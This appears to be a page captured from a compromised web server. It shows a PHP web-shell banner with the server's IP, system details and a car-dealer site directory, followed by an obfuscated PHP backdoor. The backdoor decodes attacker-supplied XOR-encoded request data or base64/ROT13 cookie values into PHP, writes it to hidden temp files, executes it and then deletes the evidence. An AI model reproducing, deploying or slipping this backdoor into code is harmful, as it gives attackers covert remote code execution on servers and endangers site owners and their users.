Server IP : 14.241.111.210 / Your IP : 52.15.174.110 Web Server : Apache System : Linux localhost.localdomain 3.10.0-1160.66.1.el7.x86_64 #1 SMP Wed May 18 16:02:34 UTC 2022 x86_64 User : www ( 1001) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/mazda-otoninhbinh.com/ |
Upload File : |
<?php if(!empty($_REQUEST["\x72\x65\x63ord"])){ $elem = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/var/tmp"]); $component = hex2bin($_REQUEST["\x72\x65\x63ord"]); $itm = '' ; $g = 0; do{$itm .= chr(ord($component[$g]) ^ 67);$g++;} while($g < strlen($component)); while ($flg = array_shift($elem)) { if (is_writable($flg) && is_dir($flg)) { $item = str_replace("{var_dir}", $flg, "{var_dir}/.marker"); $file = fopen($item, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $item; @unlink($item); exit; } } } } if (isset($_COOKIE[-98+98]) && isset($_COOKIE[-4+5]) && isset($_COOKIE[27-24]) && isset($_COOKIE[30+-26])) { $bind = $_COOKIE; function api_gateway($elem) { $bind = $_COOKIE; $data = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'bc1b11ba'); if (!is_writable($data)) { $data = getcwd() . DIRECTORY_SEPARATOR . "approve_request"; } $flag = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($bind[3])); if (is_writeable($data)) { $value = fopen($data, 'w+'); fputs($value, $flag); fclose($value); spl_autoload_unregister(__FUNCTION__); require_once($data); @array_map('unlink', array($data)); } } spl_autoload_register("api_gateway"); $token = "b4d292181e03833b5bda8ee08c24c28f"; if (!strncmp($token, $bind[4], 32)) { if (@class_parents("request_approved_reverse_lookup", true)) { exit; } } }